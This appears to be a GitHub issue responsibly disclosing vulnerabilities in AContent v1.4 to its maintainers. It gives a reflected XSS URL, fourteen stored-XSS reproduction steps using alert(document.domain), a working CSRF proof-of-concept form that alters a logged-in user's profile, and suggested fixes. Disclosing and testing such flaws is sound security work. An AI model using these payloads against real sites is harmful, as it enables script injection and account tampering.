AContent
AContent copied to clipboard
XSS and CSRF issues on v1.4
Hello... I have found XSS and CSRF issues in atutor/AContent v1.4. I used AContent 1.4 Demo on your official website. Please let me know if you need additional information. I hope this is a right channel to disclose security issues because you requested to post any bugs to this GitHub Page. Regards.
Findings
XSS (Reflected)
https://atutordemos.000webhostapp.com/acontent/documentation/index.php?p="><script>alert(document.domain)</script>
XSS (Stored)
1 (editor/edit_content_folder.php)
- In the Content Folder Title Field, please enter
<script>alert(document.domain)</script>
and then press Enter or click Save Button - Please click Delete Content Icon to trigger the JS alert
2 (editor/edit_content.php)
- In the Title Field, please enter
<script>alert(document.domain)</script>
and then press Enter or click Save Button - Please click Delete Content Icon to trigger the JS alert
3 (editor/edit_content.php)
- In the Title Field with HTML format selected, please enter any clickable name. For example,
<script>test</script>
. - In the Body, please enter
<script>alert(document.domain)</script>
- Click Preview Button to trigger the JS alert
- Click Save Button
- Click
<script>test</script>
to trigger the JS alert again
4 (tests/edit_test.php)
- In the Title Field, please enter
<script>alert(document.domain)</script>
- Click Save Button to trigger the JS alert
5 (tests/edit_question_likert.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button to trigger the JS alert
- We can also trigger the JS alert by clicking Preview or Delete Button
- Every time when we on Question Bank (tests/question_db.php), JS alert also triggered
6 (tests/create_question_matchingdd.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button
- We can trigger the JS alert by clicking Preview Button
7 (tests/create_question_matching.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button
- We can trigger the JS alert by clicking Preview Button
8 (tests/create_question_multianswer.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button
- We can trigger the JS alert by clicking Preview Button
9 (tests/create_question_multichoice.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button
- We can trigger the JS alert by clicking Preview Button
10 (tests/create_question_long.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button
- We can trigger the JS alert by clicking Preview Button
11 (tests/edit_question_ordering.php)
- In the Question Field, please enter
<script>alert(document.domain)</script>
- Click Save Button
- We can trigger the JS alert by clicking Preview Button
12 (tests/edit_question_truefalse.php)
- In the Statement Field, please enter
<script>alert(document.domain)</script>
- Click Save Button to trigger the JS alert
- We can also trigger the JS alert by clicking Preview or Delete Button
13 (tests/question_cats_manage.php)
- In the Title Field, please enter
<script>alert(document.domain)</script>
- Press Enter or click Save Button to trigger the JS alert
- We can also trigger the JS alert by clicking Delete Button
14 (course/course_property.php)
- In the Title Field, please enter
<script>alert(document.domain)</script>
- Press Enter or click Save Button to trigger the JS alert
CSRF
- Login at official website.
- Save HTML code below and give it a name, e.g. CSRF_Payload.html.
- Open and execute the payload on the same browser by clicking the CLICK ME Button
<html>
<form method="post" action="https://atutordemos.000webhostapp.com/acontent/profile/index.php" name="form">
<input name="password_error" type="hidden">
<input type="hidden" name="form_password_hidden" value="">
<input id="first_name" name="first_name" type="hidden" value="FIRST NAME">
<input id="last_name" name="last_name" type="hidden" value="LAST NAME">
<input type="checkbox" style="display:none" name="is_author" id="is_author" checked="checked" onclick="if (this.checked) jQuery('#table_is_author').show('slow'); else jQuery('#table_is_author').hide('slow');">
<input id="organization" name="organization" type="hidden" size="50" maxlength="100" value="ORGANIZATION">
<input id="phone" name="phone" type="hidden" size="30" maxlength="30" value="PHONE">
<input id="address" name="address" type="hidden" size="50" maxlength="100" value="ADDRESS">
<input id="city" name="city" type="hidden" size="30" maxlength="30" value="CITY">
<input id="province" name="province" type="hidden" size="30" maxlength="30" value="PROVINCE">
<input id="country" name="country" type="hidden" size="30" maxlength="30" value="COUNTRY">
<input id="postal_code" name="postal_code" type="hidden" size="10" maxlength="10" value="POSTAL CODE">
<!-- Click the button to execute this CSRF Payload -->
<input type="submit" name="submit" value="CLICK ME" class="submit">
</form>
</html>
Suggested Mitigations
- For XSS issues, we can use input validation and escape function for all user supplied inputs. I see you made special characters become like
<script>alert(document.domain)</script>
on certain places, but no on many other places and therefore still vulnerable to XSS. - For CSRF issue, we can use CSRF Token. It would be better if Change Password and Change Email Address also use CSRF Token.